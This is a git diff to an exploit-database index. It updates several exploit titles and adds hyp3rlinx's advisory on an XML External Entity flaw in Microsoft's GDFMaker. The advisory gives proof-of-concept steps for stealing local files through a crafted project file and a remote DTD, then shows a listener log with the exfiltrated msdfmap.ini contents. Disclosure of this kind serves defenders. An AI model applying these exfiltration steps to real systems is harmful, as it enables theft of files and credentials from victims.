Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 -39524,platforms/php/webapps/39524.js,"ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0 +39524,platforms/php/webapps/39524.js,"ATutor LMS - '/install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 39536,platforms/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80 @@ -38303,7 +38304,7 @@ id,file,description,date,author,platform,type,port 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0 41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0 41998,platforms/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,hardware,webapps,0 -42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80 +42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80 42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0 42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0 42012,platforms/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,php,webapps,0 @@ -38704,7 +38705,7 @@ id,file,description,date,author,platform,type,port 42991,platforms/linux/webapps/42991.txt,"3CX Phone System 15.5.3554.1 - Directory Traversal",2017-10-16,"Jens Regel",linux,webapps,0 43002,platforms/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43003,platforms/multiple/webapps/43003.py,"OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 -43004,platforms/multiple/webapps/43004.py,"OpenText Documentum Content Server - dmr_content Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 +43004,platforms/multiple/webapps/43004.py,"OpenText Documentum Content Server - 'dmr_content' Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43005,platforms/multiple/webapps/43005.py,"OpenText Documentum Content Server - Arbitrary File Download",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43009,platforms/xml/webapps/43009.txt,"Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution",2017-10-17,"Michael Stepankin and Olga Barinova",xml,webapps,0 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0 diff --git a/platforms/windows/local/43017.txt b/platforms/windows/local/43017.txt new file mode 100755 index 000000000..a0551c678 --- /dev/null +++ b/platforms/windows/local/43017.txt @@ -0,0 +1,125 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt +[+] ISR: ApparitionSec + + + +Vendor: +================= +www.microsoft.com + + + +Product: +=========== +GDFMaker v6.3.9600.16384 + +Game Definition File Editor (gdfmaker.exe) + +The Game Definition File Editor is a graphical utility designed for creating localized game definition files (GDFs) +as well as the necessary resource compiler scripts to compile game-definition files. The GDF editor uses a project-based +format to organize data. + + + + +Vulnerability Type: +=================== +XML External Entity + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +If a user loads an attacker supplied "GDFMakerProject" file type into GDF Maker using Ctrl+O or file menu, local files can be exfiltrated +to remote attacker controlled server, as gdfmaker.exe is vulnerable to XML External Entity Expansion attacks. + +gdfmaker.exe can be found on Windows systems as part of Windows Kits: "C:\Program Files (x86)\Windows Kits\8.1\bin\x86\" + +Note: The malicious file has to be opened using Ctrl + O or File / Open, double clicking does not seem to trigger it. +Victim may see an error like ... "There is an error in XML document(2,11)" and we get the victims file sent to our remote server. + + + +Exploit/POC: +============= +Steal "msdfmap.ini" used by Remote MS ADO services POC. + + +1) "PWN.GDFMakerProject" + + + + +%sp; +%param3; +%exfil; +]> + + +2) "exfil.dtd" + +"> + + +3) Start our file listener on Port 8000 + + +C:\>python -m SimpleHTTPServer +Serving HTTP on 0.0.0.0 port 8000 ... + + +4) Open the infected file using Ctrl+O or File Menu Open methods. + +BOOOOM! + +127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /exfil.dtd HTTP/1.1" 200 - +127.0.0.1 - - [18/Oct/2017 14:17:54] code 404, message File not found +127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /;%5Bconnect%20name%5D%20will%20modify%20the%20connection%20if%20ADC.connect=%22name%22%0D%0A;%5Bconnect%20default%5D%20will%20modify%20the%20connection%20if%20name%20is%20not%20found%0D%0A;%5Bsql%20name%5D%20will%20modify%20the%20Sql%20if%20ADC.sql=%22name(args)%22%0D%0A;%5Bsql%20default%5D%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found%0D%0A;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.%0D%0A;Only%20the%20Sql%20strings%20support%20parameters%20using%20%22?%22%0D%0A;The%20override%20strings%20must%20not%20equal%20%22%22%20or% +20they%20are%20ignored%0D%0A;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored%0D%0A;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored%0D%0A;Access=NoAccess%0D%0A;Access=ReadOnly%0D%0A;Access=ReadWrite%0D%0A;%5Buserlist%20name%5D%20allows%20specific%20users%20to%20have%20special%20access%0D%0A;The%20Access%20is%20computed%20as%20follows:%0D%0A;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.%0D%0A;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.%0D%0A% +0D%0A%5Bconnect%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccess%0D%0AAccess=NoAccess%0D%0A%0D%0A%5Bsql%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.%0D%0ASql=%22%20%22%0D%0A%0D%0A%5Bconnect%20CustomerDatabase%5D%0D%0AAccess=ReadWrite%0D%0AConnect=%22DSN=AdvWorks%22%0D%0A%0D%0A%5Bsql%20CustomerById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?%22%0D%0A%0D%0A%5Bconnect%20AuthorDatabase%5D%0D%0AAccess=ReadOnly%0D%0AConnect=%22DSN +=MyLibraryInfo;UID=MyUserID;PWD=MyPassword%22%0D%0A%0D%0A%5Buserlist%20AuthorDatabase%5D%0D%0AAdministrator=ReadWrite%0D%0A%0D%0A%5Bsql%20AuthorById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?%22 HTTP/1.1" 404 - + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: October 8, 2016 +Vendor reply : October 8, 2016 "Upon investigation we have determined that this does not meet the bar for security servicing as it would require an individual to download a malicious file from an untrusted source" +vendor reply : November 5, 2016 "opened case 35611" +vendor reply : November 8, 2016 "We have successfully reproduced the issue that you reported to us" +Vendor reply : December 5, 2016 "will be fixing this issue in next version of SDK which will be released along with major Windows update" +October 18, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file